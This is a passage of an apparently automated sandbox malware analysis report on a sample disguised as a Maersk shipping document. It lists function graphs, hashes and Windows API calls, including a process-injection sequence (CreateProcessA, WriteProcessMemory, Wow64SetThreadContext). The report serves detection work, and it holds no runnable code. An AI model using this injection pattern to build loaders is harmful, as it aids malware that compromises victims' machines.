98f18ff 1041->1057 1058 98f1904-98f1917 1041->1058 1045->1000 1046->1045 1057->1058 1061 98f191e-98f192b 1058->1061 1062 98f1919 1058->1062 1059->1060 1066 98f1a99-98f1acb 1060->1066 1067 98f1a94 1060->1067 1063 98f192d 1061->1063 1064 98f1932-98f1956 1061->1064 1062->1061 1063->1064 1069 98f195d-98f1977 1064->1069 1070 98f1958 1064->1070 1072 98f1acd 1066->1072 1073 98f1ad2-98f1b2f 1066->1073 1067->1066 1074 98f1979-98f1998 1069->1074 1075 98f19a2-98f19a3 1069->1075 1070->1069 1072->1073 1080 98f1b81-98f1ba3 1073->1080 1081 98f1b31-98f1b7b 1073->1081 1076 98f199f 1074->1076 1077 98f199a 1074->1077 1075->1040 1076->1075 1077->1076 1084 98f1bad-98f1bc0 1080->1084 1081->1080 1084->1040
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351554773.00000000098F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_98f0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: d
                                                    • API String ID: 0-2564639436
                                                    • Opcode ID: daee220b92450b90131e8ee5c6b03d27023e5028c01f260e35aee760d4183d52
                                                    • Instruction ID: 2aabd557c2b502a69a0123be08d54581bafef18ebd90ca24e4a2d57991bc7dea
                                                    • Opcode Fuzzy Hash: daee220b92450b90131e8ee5c6b03d27023e5028c01f260e35aee760d4183d52
                                                    • Instruction Fuzzy Hash: C462EE74E05229CFDB24DF69C994BDEBBB2BB89300F1091E9D409A7254DB34AE85CF50
                                                    Function 098F61DD Relevance: 1.8, Strings: 1, Instructions: 560COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1087 98f61dd-98f61e1 1088 98f6b9c-98f6ba6 1087->1088 1089 98f61e2-98f61f7 1087->1089 1089->1088 1090 98f61f8-98f6203 1089->1090 1092 98f6209-98f6215 1090->1092 1093 98f6221-98f6230 1092->1093 1095 98f628f-98f6293 1093->1095 1096 98f6299-98f62a2 1095->1096 1097 98f6333-98f639d 1095->1097 1098 98f619d-98f61a9 1096->1098 1099 98f62a8-98f62be 1096->1099 1097->1088 1135 98f63a3-98f68ea 1097->1135 1098->1088 1101 98f61af-98f61bb 1098->1101 1105 98f6308-98f631a 1099->1105 1106 98f62c0-98f62c3 1099->1106 1103 98f61bd-98f61d1 1101->1103 1104 98f6232-98f6238 1101->1104 1103->1104 1114 98f61d3-98f61dc 1103->1114 1104->1088 1107 98f623e-98f6256 1104->1107 1115 98f6adb-98f6b91 1105->1115 1116 98f6320-98f6323 1105->1116 1106->1088 1109 98f62c9-98f62fe 1106->1109 1107->1088 1118 98f625c-98f6284 1107->1118 1109->1097 1131 98f6300-98f6306 1109->1131 1114->1087 1115->1088 1119 98f6326-98f6330 1116->1119 1118->1095 1131->1105 1131->1106 1213 98f68ec-98f68f6 1135->1213 1214 98f6901-98f6994 1135->1214 1215 98f699f-98f6a32 1213->1215 1216 98f68fc 1213->1216 1214->1215 1217 98f6a3d-98f6ad0 1215->1217 1216->1217 1217->1115
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351554773.00000000098F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_98f0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: D
                                                    • API String ID: 0-2746444292
                                                    • Opcode ID: 8205cb1be00da0ad96f7012268d736cd92bac917d90684fe53c296d8953bda24
                                                    • Instruction ID: e5bf0b21922b77a7f2e7cedacb93620e39fb5b97548211e367e7af169e18d652
                                                    • Opcode Fuzzy Hash: 8205cb1be00da0ad96f7012268d736cd92bac917d90684fe53c296d8953bda24
                                                    • Instruction Fuzzy Hash: 8452B674A012198FCB54DF68C998A9DBBB6FF89300F1081D9D50DAB365DB31AE85CF90
                                                    Function 07FA8965 Relevance: .3, Instructions: 341COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 31f690415c760769ece644b056c57b4905c2b141afc7bc3f9004a92c3d03f807
                                                    • Instruction ID: c2c53938c62c9b8126d799f201321fb7eec8c25ea907d1ff904be37045e935a2
                                                    • Opcode Fuzzy Hash: 31f690415c760769ece644b056c57b4905c2b141afc7bc3f9004a92c3d03f807
                                                    • Instruction Fuzzy Hash: 8FC1BEF0B01705AFDB26EB75C8507AAB7F6AF89340F18846DD1468B390DB74E901CB51
                                                    Function 031BD570 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 527 31bd570-31bd60f GetCurrentProcess 531 31bd618-31bd64c GetCurrentThread 527->531 532 31bd611-31bd617 527->532 533 31bd64e-31bd654 531->533 534 31bd655-31bd689 GetCurrentProcess 531->534 532->531 533->534 535 31bd68b-31bd691 534->535 536 31bd692-31bd6ad call 31bd75a 534->536 535->536 540 31bd6b3-31bd6e2 GetCurrentThreadId 536->540 541 31bd6eb-31bd74d 540->541 542 31bd6e4-31bd6ea 540->542 542->541
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 031BD5FE
                                                    • GetCurrentThread.KERNEL32 ref: 031BD63B
                                                    • GetCurrentProcess.KERNEL32 ref: 031BD678
                                                    • GetCurrentThreadId.KERNEL32 ref: 031BD6D1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1336087492.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_31b0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 634f492409ff96d8a51ea0f985be8794e0bcee7da2c0c3d845a4637bbdbc28e7
                                                    • Instruction ID: a003b79768e7fad667da58f2309b9ce5d40946e1a5b8b34a4c7d2d59df6fe7f8
                                                    • Opcode Fuzzy Hash: 634f492409ff96d8a51ea0f985be8794e0bcee7da2c0c3d845a4637bbdbc28e7
                                                    • Instruction Fuzzy Hash: 175165B09003498FDB48DFA9D688BDEBBF5EF48314F248459E419B72A0D7345984CF65
                                                    Function 031BD580 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 549 31bd580-31bd60f GetCurrentProcess 553 31bd618-31bd64c GetCurrentThread 549->553 554 31bd611-31bd617 549->554 555 31bd64e-31bd654 553->555 556 31bd655-31bd689 GetCurrentProcess 553->556 554->553 555->556 557 31bd68b-31bd691 556->557 558 31bd692-31bd6ad call 31bd75a 556->558 557->558 562 31bd6b3-31bd6e2 GetCurrentThreadId 558->562 563 31bd6eb-31bd74d 562->563 564 31bd6e4-31bd6ea 562->564 564->563
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 031BD5FE
                                                    • GetCurrentThread.KERNEL32 ref: 031BD63B
                                                    • GetCurrentProcess.KERNEL32 ref: 031BD678
                                                    • GetCurrentThreadId.KERNEL32 ref: 031BD6D1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1336087492.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_31b0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: c7a8b94199dd6b6ae00a7a22ac0ec8bdf88c66c303ab4d1cd19f01be31e2ae7d
                                                    • Instruction ID: 04063685a8ab9ad0107486992cc55a0814ec742c1869e38da2545eddcf1dc3cc
                                                    • Opcode Fuzzy Hash: c7a8b94199dd6b6ae00a7a22ac0ec8bdf88c66c303ab4d1cd19f01be31e2ae7d
                                                    • Instruction Fuzzy Hash: 265154B09003098FDB58DFAAD688BDEBBF5EF88314F248459E419B7260D7349984CF65
                                                    Function 07C49250 Relevance: 3.9, Strings: 3, Instructions: 103COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 622 7c49250-7c4925d 623 7c492b5 622->623 624 7c4925f-7c49276 622->624 625 7c492b7-7c492d5 623->625 626 7c49333-7c49342 624->626 629 7c492d7-7c492da 625->629 630 7c492dc-7c492e9 625->630 631 7c4934d-7c493ae 626->631 632 7c492eb-7c492fa 629->632 630->632 655 7c4932a 631->655 638 7c49312 632->638 639 7c492fc-7c49302 632->639 643 7c49315-7c49329 638->643 641 7c49304 639->641 642 7c49306-7c49308 639->642 641->638 642->638 657 7c49287-7c49331 655->657 658 7c49280 655->658 657->655 658->625 658->626 658->643 658->657
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8cq$8cq$8cq
                                                    • API String ID: 0-1458523781
                                                    • Opcode ID: e179ad07c9a9b77fd292b3b1ae6f6b7681a7f9e0df03b3d89e808bb481adf45f
                                                    • Instruction ID: 4c44aa58c6ce915b2997c4311dc2a9adaa92f1266ea6fd0d9a6c21b4e77dc7e5
                                                    • Opcode Fuzzy Hash: e179ad07c9a9b77fd292b3b1ae6f6b7681a7f9e0df03b3d89e808bb481adf45f
                                                    • Instruction Fuzzy Hash: C531F6B4A18226DFDB109BA6C4845BFBBB1FBCB310F11405AD547A72C5DB316C0687A3
                                                    Function 07C4837F Relevance: 3.8, Strings: 3, Instructions: 39COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 683 7c4837f-7c48387 684 7c483df-7c483e2 683->684 685 7c48389-7c48538 683->685 687 7c483e4-7c483ea 684->687 688 7c483fa-7c48417 684->688 689 7c483ec 687->689 690 7c483ee-7c483f0 687->690 693 7c48582-7c48587 688->693 694 7c4841d-7c48513 688->694 689->688 690->688
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8$$_q$$_q
                                                    • API String ID: 0-336898379
                                                    • Opcode ID: c9c94848a78ed2001ea31f27ee39d51b39ac6dbb2fc36ef4ae9ace1e0f25b4f1
                                                    • Instruction ID: e35d832cabe3e35632ff60f95f6908c54e19b4fd29ac06d27461fc1ec46641e6
                                                    • Opcode Fuzzy Hash: c9c94848a78ed2001ea31f27ee39d51b39ac6dbb2fc36ef4ae9ace1e0f25b4f1
                                                    • Instruction Fuzzy Hash: F7012DF0654241DFEB284B6589997793BF1EB02708F144057D5069F582CBB69940CB62
                                                    Function 07C42AC7 Relevance: 2.7, Strings: 2, Instructions: 187COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 808 7c42ac7-7c42ad0 809 7c42aa5-7c42aaa 808->809 810 7c42ad2-7c42ae7 808->810 811 7c42aef-7c42af1 810->811 812 7c42af3-7c42b08 811->812 813 7c42b0b-7c42b78 call 7c420d8 811->813 822 7c42c24-7c42c3b 813->822 823 7c42b7e-7c42b80 813->823 834 7c42c41 822->834 835 7c42c3d-7c42c3f 822->835 824 7c42b86-7c42b91 call 7c422f0 823->824 825 7c42cb0-7c42cee 823->825 831 7c42b93-7c42b95 824->831 832 7c42bae-7c42bb2 824->832 836 7c42b97-7c42b9e 831->836 837 7c42ba0-7c42bab call 7c416cc 831->837 838 7c42bb4-7c42bc8 call 7c42418 832->838 839 7c42c11-7c42c1a 832->839 841 7c42c46-7c42c48 834->841 835->841 836->832 837->832 848 7c42bde-7c42be2 838->848 849 7c42bca-7c42bdb call 7c416cc 838->849 845 7c42c7d-7c42ca9 841->845 846 7c42c4a-7c42c76 841->846 845->825 846->845 853 7c42be4 848->853 854 7c42bea-7c42c03 848->854 849->848 853->854 859 7c42c05 854->859 860 7c42c0e 854->860 859->860 860->839
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (cq$Hcq
                                                    • API String ID: 0-4250889185
                                                    • Opcode ID: 49e2cddf1872d637f19c79a406055d95044996cd468d4b47542c39a1b2ba84b2
                                                    • Instruction ID: 72f7152ab26ca09d32f36a4039dd4e0ec29a9451eda55b373f3bcfff20ab4789
                                                    • Opcode Fuzzy Hash: 49e2cddf1872d637f19c79a406055d95044996cd468d4b47542c39a1b2ba84b2
                                                    • Instruction Fuzzy Hash: F051E3B1B001158FDB25EF79A9552BE7BE6BFC8210F148529E806EB394DF348D018795
                                                    Function 07C482D0 Relevance: 2.6, Strings: 2, Instructions: 59COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 915 7c482d0-7c482dc 916 7c48333 915->916 917 7c482de-7c48335 915->917 916->917 934 7c48335 call 7c4839f 917->934 935 7c48335 call 7c4837f 917->935 919 7c4833b-7c4833d 923 7c482e6-7c482ec 919->923 924 7c482fc-7c4830b 919->924 925 7c482f0-7c482f2 923->925 926 7c482ee 923->926 927 7c4830d-7c4831a 924->927 928 7c4833f-7c4851f 924->928 925->924 926->924 927->928 929 7c4831c-7c48332 927->929 934->919 935->919
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $_q$$_q
                                                    • API String ID: 0-458585787
                                                    • Opcode ID: 0240737d33304428b5444c7fb5bb849dec65faba82bc3937ca094d3fb59c0fbb
                                                    • Instruction ID: 532c108f871271389fb06f3fe3a63227ba4c86026efe31fea4d197d567ac8f65
                                                    • Opcode Fuzzy Hash: 0240737d33304428b5444c7fb5bb849dec65faba82bc3937ca094d3fb59c0fbb
                                                    • Instruction Fuzzy Hash: AA11C1B091D646CFC328DB2AC84467ABFF8FB07344F1442ABE50AD7242D7748941C7A6
                                                    Function 07C4839F Relevance: 2.5, Strings: 2, Instructions: 34COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 936 7c4839f-7c483d7 938 7c483e0-7c483e2 936->938 939 7c483e4-7c483ea 938->939 940 7c483fa-7c48417 938->940 941 7c483ec 939->941 942 7c483ee-7c483f0 939->942 944 7c48582-7c48587 940->944 945 7c4841d-7c48513 940->945 941->940 942->940
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8$$_q
                                                    • API String ID: 0-3070280950
                                                    • Opcode ID: 6758c435742177f7e7a0311af77b955d2d19e41eb57be245d0d2ba542b8e3a45
                                                    • Instruction ID: b66fbb86d26117c98ba64c372bd4cf4c8468a1503d1a08d388038e52d4e420b9
                                                    • Opcode Fuzzy Hash: 6758c435742177f7e7a0311af77b955d2d19e41eb57be245d0d2ba542b8e3a45
                                                    • Instruction Fuzzy Hash: EEF0FCF0B50305DBEB208B14CC96BA973B1FB10708F188862DD05AF681E6F19D90C791
                                                    Function 07FA5CEC Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07FA5F2E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: 00cea3f20c0735b0c301ec442ea8c0f17a1ca8064357c0129e8ea5e7de9efa98
                                                    • Instruction ID: f0ac7dc2c23e19ca95a88ecdbbf7703ae83dad8ae6535d9ce7383be9832494c6
                                                    • Opcode Fuzzy Hash: 00cea3f20c0735b0c301ec442ea8c0f17a1ca8064357c0129e8ea5e7de9efa98
                                                    • Instruction Fuzzy Hash: B0A17DB1D0061ADFDB10CFA8C8807EEBBB2BF44314F188569D859A7240DB749995CF92
                                                    Function 07FA5CF8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07FA5F2E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: 15030d7908caa0760b729a0b59f4d2a44165f1efa7129ad30785913e1997e340
                                                    • Instruction ID: bad94647408f639b93aa8b8bb325c6b576efc9fc06ee7bc2665dbe1f522d3d14
                                                    • Opcode Fuzzy Hash: 15030d7908caa0760b729a0b59f4d2a44165f1efa7129ad30785913e1997e340
                                                    • Instruction Fuzzy Hash: 74916DB1D0021ADFDF10CF68C880BDEBBB2BF48314F188569D859A7240DB749995CF92
                                                    Function 031BB300 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 031BB566
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1336087492.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_31b0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: f526ee79a00964a564c5ec4db77dbefc74b2932e38a7c143df248ba605a6fac9
                                                    • Instruction ID: 51ff7b76cd00b10375a54d480dc28022e4bb6b3fe66f4d3012223ad0bbcc84bc
                                                    • Opcode Fuzzy Hash: f526ee79a00964a564c5ec4db77dbefc74b2932e38a7c143df248ba605a6fac9
                                                    • Instruction Fuzzy Hash: 19815770A04B058FD724DF2AD44479ABBF5FF88300F148A2AD48ADBB54D774E949CBA1
                                                    Function 031B590C Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 031B59C9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1336087492.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_31b0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: ada19ed37d79fb1950cc994568666a28521471f43d8d2599857d142feb0b740a
                                                    • Instruction ID: b5671f4731f4ca1a11cc013863c5d8304355aa89d75a658affc3db60a4c7b7ee
                                                    • Opcode Fuzzy Hash: ada19ed37d79fb1950cc994568666a28521471f43d8d2599857d142feb0b740a
                                                    • Instruction Fuzzy Hash: 8841EFB1C00619CFDB24CFA9C885BDDBBB2BF49304F24816AD408BB255DB756989CF90
                                                    Function 031B44B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 031B59C9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1336087492.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_31b0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: ba5151a36826af3bd1cd0e92e4019019c81df5fea66f2aebda5c8507c6392e99
                                                    • Instruction ID: 7f97b8e9faf16098be9fec292ad5b9d9a5877fd83c00021b966d4fd5e99d69d1
                                                    • Opcode Fuzzy Hash: ba5151a36826af3bd1cd0e92e4019019c81df5fea66f2aebda5c8507c6392e99
                                                    • Instruction Fuzzy Hash: 7A41CFB0C0061DCBDB24DFA9C884ADDBBB6BF49304F20806AD408AB255DB756989CF90
                                                    Function 07FA5A68 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07FA5B00
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: 7c9679ae3a8578968ee9a4459f6e5bed52cc6eef0f30577a571ab4c8ca36ad08
                                                    • Instruction ID: e5c6311f061c42baa059379923353ba8980a09f9aa420657400229880302a726
                                                    • Opcode Fuzzy Hash: 7c9679ae3a8578968ee9a4459f6e5bed52cc6eef0f30577a571ab4c8ca36ad08
                                                    • Instruction Fuzzy Hash: C3215AB1D003599FCB10DFA9C881BDEBBF5FF48320F14842AE918A7240C7749954CBA0
                                                    Function 084AEFC0 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 084AF05F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351198590.00000000084A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_84a0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: DrawText
                                                    • String ID:
                                                    • API String ID: 2175133113-0
                                                    • Opcode ID: 71efb65df0bbb6f5c224973deb5c29945aaea1cc98545fce3b2f59974bb2c338
                                                    • Instruction ID: 1d3f936c28c58f4ba039e59cf30cffc7c8e9df5e1e72ecb5e91db9aeae7ff88f
                                                    • Opcode Fuzzy Hash: 71efb65df0bbb6f5c224973deb5c29945aaea1cc98545fce3b2f59974bb2c338
                                                    • Instruction Fuzzy Hash: EB31CEB5D002099FDB10CFAAD884ADEBBF5FB58320F14842EE919A7310D775A944CFA4
                                                    Function 07FA5A70 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07FA5B00
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: d255dfde123b02c73f72ba6328956cbc2e93979e96ab4e8b6091d612741a4259
                                                    • Instruction ID: 740f7af4eef79a89251753a7b4c356b61c2268e7c5d0a09a93516e2aa947daee
                                                    • Opcode Fuzzy Hash: d255dfde123b02c73f72ba6328956cbc2e93979e96ab4e8b6091d612741a4259
                                                    • Instruction Fuzzy Hash: 8C2136B1D003199FCB10DFA9C885BDEBBF5FF48310F14882AE919A7240D7789954CBA0
                                                    Function 084AEFC8 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 084AF05F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351198590.00000000084A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_84a0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: DrawText
                                                    • String ID:
                                                    • API String ID: 2175133113-0
                                                    • Opcode ID: e25214cdc2a82a09ab0da0070668861146d6cc6a7700fbb3b4c7c07cbbc45da2
                                                    • Instruction ID: c0756a8822e7fb55fc4e9c5771d2f68729a49c01f5c0e19cafaac9c1240cd182
                                                    • Opcode Fuzzy Hash: e25214cdc2a82a09ab0da0070668861146d6cc6a7700fbb3b4c7c07cbbc45da2
                                                    • Instruction Fuzzy Hash: 2221CEB5D002099FDB10CFAAD884A9EBBF5EB58320F14842AE919A7310D775A944CFA0
                                                    Function 07FA5B58 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07FA5BE0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: 8b98eb0451c38b7863978d0f0eee84a3bcb325298691849fe8a801d5d5457acc
                                                    • Instruction ID: 7c8671f596b068077066ac0a1f0122597281f1a63763a375e4fdaf00f1ff9f23
                                                    • Opcode Fuzzy Hash: 8b98eb0451c38b7863978d0f0eee84a3bcb325298691849fe8a801d5d5457acc
                                                    • Instruction Fuzzy Hash: 662116B1D003599FCB10DFAAC881ADEFBF5FF48310F14882AE959A7240D7759954CBA1
                                                    Function 07FA5498 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07FA551E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: af890edadef4c19d561c9b7088725c475ce4baed40e29bdcd4a0ae40dd63221b
                                                    • Instruction ID: accd6ad9148124c57c1834e765bd0dd970124600c2f16555618832839aa29c8a
                                                    • Opcode Fuzzy Hash: af890edadef4c19d561c9b7088725c475ce4baed40e29bdcd4a0ae40dd63221b
                                                    • Instruction Fuzzy Hash: FF2157B1D003099FCB10DFAAC485BEEBBF4EF48324F14842AD819A7240D7789945CFA0
                                                    Function 031BD7C0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 031BD84F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1336087492.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
